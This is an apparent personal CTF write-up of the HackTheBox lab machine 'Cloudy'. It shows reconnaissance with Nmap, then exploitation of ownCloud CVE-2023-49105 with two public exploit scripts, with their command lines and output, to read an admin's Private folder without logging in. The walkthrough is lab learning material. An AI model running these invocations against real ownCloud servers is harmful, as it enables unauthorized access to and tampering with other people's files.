Cloudy — HackTheBox Machine
Cloudy is a very easy HackTheBox Enterprise machine I pwned when playing CTFs to prepare me for the Wicked6 2024 Cyber Game. Interestingly, I haven’t found this machine on the main HackTheBox platform. I thought of documenting my experience because it was unique. This machine just had one flag, and the objective was to find the flag hidden in a folder named ‘Private’.
I started by performing an Nmap scan: nmap -sV -sC -oA nmap 10.129.230.169
# Nmap 7.94SVN scan initiated Sat Feb 3 10:10:46 2024 as: nmap -sV -sC -oA nmap 10.129.230.169
Nmap scan report for 10.129.230.169
Host is up (0.37s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
8080/tcp open http Apache httpd
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache
|_http-title: Did not follow redirect to http://cloudy.htb:8080/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb 3 10:11:56 2024 -- 1 IP address (1 host up) scanned in 70.02 seconds
Upon completion of the scan, I found 2 open TCP ports. On port 22, SSH server is running and on port 8080 an Apache web server is running.
Under port 8080, it stated a redirection to: http://cloudy.htb:8080/. With that, I added '10.129.230.169 cloudy.htb’
to my /etc/hosts
file.
I navigated to the site and it led me to a login page.
Since I was just discovering ownCloud
I did a research and found it’s a software for sharing and syncing file. I tried a few default logins but this wasn’t successful. So I decided to check if there are any other directories or page that would be useful.
After performing the directory brute-force, the only thing that stood out was /status.php
. Navigated to it and found info about the product including the version.
With this, I did searched if there is a vulnerability for this version. Interestingly, I found one: CVE-2023–49105
An attacker can access, modify, or delete any file without authentication if the username of a victim is known, and the victim has no signing-key configured.
more information about the vulnerability can be found here.
To exploit this vulnerability, I had combine two exploits: ownedcloud and ownedcloud-exploits.
After cloning them both to my local machine and installing the requirements, I ran the first exploit.
python3 ownedcloud/dav.py -u admin -t http://cloudy.htb:8080
└─$ python3 /home/vxxmass/Downloads/ownedcloud/dav.py -u admin -t http://cloudy.htb:8080
INFO:root:Pwning admin!
INFO:root:admin's root folder content
INFO:root:File(name='/remote.php/webdav/', size=0, mtime='Thu, 14 Dec 2023 07:29:31 GMT', ctime='', contenttype='')
INFO:root:File(name='/remote.php/webdav/Documents/', size=0, mtime='Thu, 14 Dec 2023 07:29:02 GMT', ctime='', contenttype='')
INFO:root:File(name='/remote.php/webdav/Learn%20more%20about%20ownCloud/', size=0, mtime='Thu, 14 Dec 2023 07:29:02 GMT', ctime='', contenttype='')
INFO:root:File(name='/remote.php/webdav/Photos/', size=0, mtime='Thu, 14 Dec 2023 07:29:02 GMT', ctime='', contenttype='')
INFO:root:File(name='/remote.php/webdav/Private/', size=0, mtime='Thu, 14 Dec 2023 07:29:31 GMT', ctime='', contenttype='')
The first script was used to connect to the WebDAV server, listing the contents of the admin user’s root directory. From this, I could see the Private
folder.
I ran the next exploit to get access to the Private folder of the admin user.
└─$ ./pwncloud-webdav.py http://cloudy.htb:8080/login admin
[+] Proxy server running on localhost:8800
[*] Browse user files: dav://anonymous@localhost:8800/remote.php/dav/files/admin
[*] Browse everything: dav://anonymous@localhost:8800/remote.php/dav
127.0.0.1 - - [21/Feb/2024 05:03:05] "OPTIONS /remote.php/dav/files/admin HTTP/1.1" 302 -
127.0.0.1 - - [21/Feb/2024 05:03:37] "OPTIONS /remote.php/webdav/Private HTTP/1.1" 302 -
When this ran, it directed me to browse the admin user files in my local network:
dav://anonymous@localhost:8800/remote.php/dav/files/admin
After doing so, I could see the folders.
Since the goal was to access the Private folder and get the flag. I navigated to it and got the flag.
Quite easy right?
Yeah, it was but not as easy as it’s written here. I encountered errors when running the exploits and also trying to access to local network. But with all these it was fun and interesting because I learned new things.
Thank you for reading to this point.
Happy Hacking!